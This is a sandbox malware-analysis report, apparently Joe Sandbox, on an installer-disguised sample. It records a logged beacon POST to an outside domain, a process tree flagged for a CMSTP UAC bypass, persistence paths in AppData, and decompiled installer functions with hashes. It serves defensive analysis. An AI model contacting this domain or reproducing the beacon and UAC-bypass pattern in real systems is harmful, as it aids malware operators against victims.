2024-11-14 18:58:42 UTC	715	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:58:42 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U%2BvNlsgmJSoDi0Uu4yhasMYkfVUNk3ugtZUbclTkt6Z9PpoKIyHFoQN1k%2F1ask7tiBYBwBWWhlSJzrqcmTFZm0EW3gw%2Ff%2F6DPA0m6GgPyxGmZUZYDAi5v82IWukh%2BwMI2RkNzw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293c021aef0ffc-LAX alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=33518&sent=59&recv=103&lost=0&retrans=0&sent_bytes=2841&recv_bytes=96942&delivery_rate=86886&cwnd=32&unsent_bytes=0&cid=7021e8c59cb5b64b&ts=830&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	58029	188.114.96.3	443	4032	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:58:43 UTC	417	OUT	POST /heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 match: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 35 Host: sirnisirlo.online
2024-11-14 18:58:43 UTC	35	OUT	Data Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2024-11-14 18:58:43 UTC	712	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:58:43 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bgL7OG5vhIdnBYGH%2Fbt68RP3pQQQ3%2BKS8ER4jvaS50IH2kl5eqblBm8IVpWOkmk3yBjiVBEmcLm%2BxX2RBVR0gk0FrOdj1sv%2F%2BHxaUYSi6k1uUJE3Rfcd3n4JcTRMeTHr7IgSsg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293c0ceca1d788-NRT alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=130982&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1088&delivery_rate=22103&cwnd=32&unsent_bytes=0&cid=1eece44cd04ef73c&ts=579&x=0"

Target ID:	0
Start time:	13:57:03
Start date:	14/11/2024
Path:	C:\Users\user\Desktop\BkTwXj17DH.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\BkTwXj17DH.exe"
Imagebase:	0x4c0000
File size:	14'489'740 bytes
MD5 hash:	B6AB13B3B9903BF84327737BA227BAB3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:57:03
Start date:	14/11/2024
Path:	C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe" -burn.clean.room="C:\Users\user\Desktop\BkTwXj17DH.exe" -burn.filehandle.attached=516 -burn.filehandle.self=524
Imagebase:	0xd50000
File size:	14'413'036 bytes
MD5 hash:	EB26DFA5E4E3170D90B5629DF0715AA9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 8%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:57:05
Start date:	14/11/2024
Path:	C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe"
Imagebase:	0x7ff72a900000
File size:	1'266'616 bytes
MD5 hash:	B84DFABE933D1160F624693D94779CE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1461341393.000001918E057000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:57:07
Start date:	14/11/2024
Path:	C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
Imagebase:	0x7ff7f4110000
File size:	1'266'616 bytes
MD5 hash:	B84DFABE933D1160F624693D94779CE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.1528762272.000001B2559A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:57:09
Start date:	14/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:57:09
Start date:	14/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	13:57:30
Start date:	14/11/2024
Path:	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
Imagebase:	0x140000000
File size:	2'364'728 bytes
MD5 hash:	967F4470627F823F4D7981E511C9824F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:57:34
Start date:	14/11/2024
Path:	C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe"
Imagebase:	0x7ff7f4110000
File size:	1'266'616 bytes
MD5 hash:	B84DFABE933D1160F624693D94779CE5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1807657601.00000275460F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	13:57:36
Start date:	14/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.1859033846.0000000003670000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.1859383110.0000000005684000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	13:57:36
Start date:	14/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	13:57:47
Start date:	14/11/2024
Path:	C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe"
Imagebase:	0x7ff7f4110000
File size:	1'266'616 bytes
MD5 hash:	B84DFABE933D1160F624693D94779CE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.1936565276.000002259DA87000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	13:57:49
Start date:	14/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.2160143718.0000000004D12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	13:57:49
Start date:	14/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	13:58:10
Start date:	14/11/2024
Path:	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe
Imagebase:	0x140000000
File size:	2'364'728 bytes
MD5 hash:	967F4470627F823F4D7981E511C9824F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.2410296879.0000000002713000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Function 004C3CC4 Relevance: 47.6, APIs: 23, Strings: 4, Instructions: 320
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 004C3D40
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 004C3D53
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000001,00000000,?), ref: 004C3D9E
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 004C3DA8
GetTempPathW.KERNEL32(00000104,?,?,?,?,00000001,00000000,?), ref: 004C3DF6
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 004C3E00
FindFirstFileW.KERNELBASE(?,?,?,*.*,?,?,?,?,00000001,00000000,?), ref: 004C3E53
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 004C3E64
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000001,00000000,?), ref: 004C3F3E
DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,00000001,00000000,?), ref: 004C3F52
GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000001,00000000,?), ref: 004C3F79
MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000001,00000000,?), ref: 004C3F9C
MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 004C3FB5
FindNextFileW.KERNELBASE(000000FF,?,?,?,?,?,?,?,00000001,00000000,?), ref: 004C3FC5
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 004C3FDA
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 004C4009
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 004C402B
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 004C404D
RemoveDirectoryW.KERNELBASE(?,?,?,?,00000001,00000000,?), ref: 004C4064
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 004C406E
MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,00000000,?), ref: 004C4095
GetLastError.KERNEL32(?,?,?,00000001,00000000,?), ref: 004C40B0
FindClose.KERNEL32(000000FF,?,?,?,00000001,00000000,?), ref: 004C40E6

Strings

4Wu, xrefs: 004C3DF6
dirutil.cpp, xrefs: 004C3D76, 004C3FFA
DEL, xrefs: 004C3F6D
*.*, xrefs: 004C3E2C

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
String ID: 4Wu$*.*$DEL$dirutil.cpp
API String ID: 1544372074-971470659
Opcode ID: c2668593826186c8b63f36d5a26840b22c300defbba2a2b53e99a10b8eba5f5c
Instruction ID: 5419836177bd99f34df68800e3b5b6ded64ea1bcb0b8cc73d77e81a2b8cbf3d9
Opcode Fuzzy Hash: c2668593826186c8b63f36d5a26840b22c300defbba2a2b53e99a10b8eba5f5c
Instruction Fuzzy Hash: ECB13A3AD412399BDB705E658D05FABB6746F40721F01429FEE08B7280D73A8E80CF98

Function 004C5195 Relevance: 38.8, APIs: 5, Strings: 17, Instructions: 315
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 004C5217

Part of subcall function 005004F8: InitializeCriticalSection.KERNEL32(0052B5FC,?,004C5223,00000000,?,?,?,?,?,?), ref: 0050050F

Part of subcall function 004C120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,004C523F,00000000,?), ref: 004C1248
Part of subcall function 004C120A: GetLastError.KERNEL32(?,?,?,004C523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 004C1252

CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 004C5285

Part of subcall function 00500E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00500E28

GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 004C5317
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 004C5321
CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004C558E

Strings

Failed to parse command line., xrefs: 004C5245
Failed to initialize Cryputil., xrefs: 004C52A6
Failed to initialize core., xrefs: 004C53C3
engine.cpp, xrefs: 004C5345
3.11.1.2318, xrefs: 004C5384
Failed to initialize engine state., xrefs: 004C526C
Failed to get OS info., xrefs: 004C534F
Failed to run embedded mode., xrefs: 004C5444
Failed to initialize Regutil., xrefs: 004C52C9
Failed to initialize COM., xrefs: 004C5291
Failed to run per-machine mode., xrefs: 004C546C
Failed to initialize XML util., xrefs: 004C52F9
Failed to initialize Wiutil., xrefs: 004C52E1
Failed to run untrusted mode., xrefs: 004C54B6
Invalid run mode., xrefs: 004C53F9
Failed to run per-user mode., xrefs: 004C5494
Failed to run RunOnce mode., xrefs: 004C541C

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
API String ID: 3262001429-510904028
Opcode ID: f478fe10df6612e7faa3af53eba01644f9c72b819617d2e8b50b1fc8cc4a4a7e
Instruction ID: 24c2ddd4d2205804e594dce90623fc82a787180dac0f316426117e7213f7344f
Opcode Fuzzy Hash: f478fe10df6612e7faa3af53eba01644f9c72b819617d2e8b50b1fc8cc4a4a7e
Instruction Fuzzy Hash: 08B1B675D406299BDB71AB55CC46FEE76B4BF44315F0001EFE908A6281DB38AEC0CE99

Function 0050304F Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153libraryloadercomCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00503609,00000000,?,00000000), ref: 00503069
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,004EC025,?,004C5405,?,00000000,?), ref: 00503075
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 005030B5
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005030C1
GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 005030CC
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005030D6
CoCreateInstance.OLE32(0052B6B8,00000000,00000001,0050B818,?,?,?,?,?,?,?,?,?,?,?,004EC025), ref: 00503111
ExitProcess.KERNEL32 ref: 005031C0

Strings

xmlutil.cpp, xrefs: 00503099
kernel32.dll, xrefs: 00503059
Wow64RevertWow64FsRedirection, xrefs: 005030CE
Wow64EnableWow64FsRedirection, xrefs: 005030C3
IsWow64Process, xrefs: 005030AF
Wow64DisableWow64FsRedirection, xrefs: 005030BB

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
API String ID: 2124981135-499589564
Opcode ID: e466e8acdd12c42176e534e0bc961274371ba732550268d40c266de9e67b61cc
Instruction ID: 64eac4beca4a19fc542dcaf50f97f74d1ba2c54da7dcd5a4396460cffebd7815
Opcode Fuzzy Hash: e466e8acdd12c42176e534e0bc961274371ba732550268d40c266de9e67b61cc
Instruction Fuzzy Hash: 25419235A01225ABDB249FA8C899BAEBFB8FF49710F154069E901E72D0D771DF04DB90

Function 004C1070 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 78fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004C33C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,004C10DD,?,00000000), ref: 004C33E8

CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 004C10F6

Part of subcall function 004C1175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,004C111A,cabinet.dll,00000009,?,?,00000000), ref: 004C1186
Part of subcall function 004C1175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,004C111A,cabinet.dll,00000009,?,?,00000000), ref: 004C1191
Part of subcall function 004C1175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004C119F
Part of subcall function 004C1175: GetLastError.KERNEL32(?,?,?,?,?,004C111A,cabinet.dll,00000009,?,?,00000000), ref: 004C11BA
Part of subcall function 004C1175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004C11C2
Part of subcall function 004C1175: GetLastError.KERNEL32(?,?,?,?,?,004C111A,cabinet.dll,00000009,?,?,00000000), ref: 004C11D7

CloseHandle.KERNELBASE(?,?,?,?,0050B4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 004C1131

Strings

cabinet.dll, xrefs: 004C1099, 004C1114
wininet.dll, xrefs: 004C10AE
msi.dll, xrefs: 004C10A0
msasn1.dll, xrefs: 004C10C3
comres.dll, xrefs: 004C10B5
crypt32.dll, xrefs: 004C10CA
feclient.dll, xrefs: 004C10D1
version.dll, xrefs: 004C10A7
clbcatq.dll, xrefs: 004C10BC

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
API String ID: 3687706282-3151496603
Opcode ID: b132b8ad50139e30caa7efaca9ffde97344c760e6068630e3b72a06a607d704c
Instruction ID: e8acafbcc31f159b62ce6ea5036224501d01085baefcd2f75cddbe1e7ed7a7de
Opcode Fuzzy Hash: b132b8ad50139e30caa7efaca9ffde97344c760e6068630e3b72a06a607d704c
Instruction Fuzzy Hash: 1E21D27590021CABDB109FA5CC49FDFBBF9BB09714F04411EEA10B72D2DB7859048BA4

Function 004DA0BB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

Strings

Failed to copy working folder., xrefs: 004DA116
Failed create working folder., xrefs: 004DA0EE
Failed to calculate working folder to ensure it exists., xrefs: 004DA0D8

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: CurrentDirectoryErrorLastProcessWindows
String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
API String ID: 3841436932-2072961686
Opcode ID: 4dddad3c84a1903afdb1e40787d6559ec0b7a7d465c14dc510dedf28837a9807
Instruction ID: 879157c60bfc58828c38d32898ea3ed3fb442c2100c665abb137fb2956d1af0c
Opcode Fuzzy Hash: 4dddad3c84a1903afdb1e40787d6559ec0b7a7d465c14dc510dedf28837a9807
Instruction Fuzzy Hash: 71012832801524FA8F325E45CC1AC9F7E78EF84720B10425BF80076311DB399E10E689

Function 004F48D8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,004F48AE,00000000,00527F08,0000000C,004F4A05,00000000,00000002,00000000), ref: 004F48F9
TerminateProcess.KERNEL32(00000000,?,004F48AE,00000000,00527F08,0000000C,004F4A05,00000000,00000002,00000000), ref: 004F4900
ExitProcess.KERNEL32 ref: 004F4912

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: f6467e1a22a8c0a603c3d3994ca51a2b889cc1c15587c6d88c16b136cf33662e
Instruction ID: b58c763c244fe35fb137ce23eb007f268764a2726faad592c754e741c4fb3ab0
Opcode Fuzzy Hash: f6467e1a22a8c0a603c3d3994ca51a2b889cc1c15587c6d88c16b136cf33662e
Instruction Fuzzy Hash: FCE04F7150010CABCF116F65CD48D5E3B69EF90385F004015F9154A222CF79DC42DA84

Function 004C394F Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,000001C7,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3960
RtlAllocateHeap.NTDLL(00000000,?,004C2274,000001C7,00000001,80004005,8007139F,?,?,00500267,8007139F,?,00000000,00000000,8007139F), ref: 004C3967

Memory Dump Source

Source File: 00000000.00000002.1476678787.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000000.00000002.1476650997.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476741547.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476807537.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c0000_BkTwXj17DH.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: b3f25cc3a24a27422bb7a622933b40fd575e0e6f4977701e7d0ff56afa6cb4bc
Instruction ID: a42b88cd397b0b0bc952af79f997571a00ac5571c336e2f1067da9419009fdaa
Opcode Fuzzy Hash: b3f25cc3a24a27422bb7a622933b40fd575e0e6f4977701e7d0ff56afa6cb4bc
